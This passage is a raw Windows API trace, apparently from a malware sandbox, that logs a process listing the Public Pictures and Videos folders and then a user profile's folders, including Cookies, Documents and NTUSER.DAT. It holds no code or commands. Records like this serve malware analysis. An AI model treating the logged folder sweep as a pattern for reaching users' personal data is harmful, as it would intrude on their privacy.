nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8ff080 [0256.685] FindNextFileW (in: hFindFile=0x8ff080, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.685] FindNextFileW (in: hFindFile=0x8ff080, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.685] FindNextFileW (in: hFindFile=0x8ff080, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.685] FindClose (in: hFindFile=0x8ff080 | out: hFindFile=0x8ff080) returned 1 [0256.685] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures" (normalized: "c:\\users\\public\\pictures"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.685] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Pictures\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fec40 [0256.686] FindNextFileW (in: hFindFile=0x8fec40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.686] FindNextFileW (in: hFindFile=0x8fec40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.686] FindNextFileW (in: hFindFile=0x8fec40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.686] FindClose (in: hFindFile=0x8fec40 | out: hFindFile=0x8fec40) returned 1 [0256.686] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos" (normalized: "c:\\users\\public\\videos"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.686] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Videos\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fefc0 [0256.686] FindNextFileW (in: hFindFile=0x8fefc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.687] FindNextFileW (in: hFindFile=0x8fefc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.687] FindNextFileW (in: hFindFile=0x8fefc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.687] FindClose (in: hFindFile=0x8fefc0 | out: hFindFile=0x8fefc0) returned 1 [0256.687] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX" (normalized: "c:\\users\\rdhj0cnfevzx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.687] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\*", lpFindFileData=0x123a3810 | out: lpFindFileData=0x123a3810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fef40 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7e0e7cc, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7e0e7cc, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7afe133, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7afe133, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0256.688] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3ce3dbd0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6b125138, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x6b125138, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x180000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x96000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63434853, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7bfe63b, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7bfe63b, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7ce0f4a, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7ce0f4a, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0256.689] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.690] FindClose (in: hFindFile=0x8fef40 | out: hFindFile=0x8fef40) returned 1 [0256.690] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Contacts" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.690] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Contacts\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", 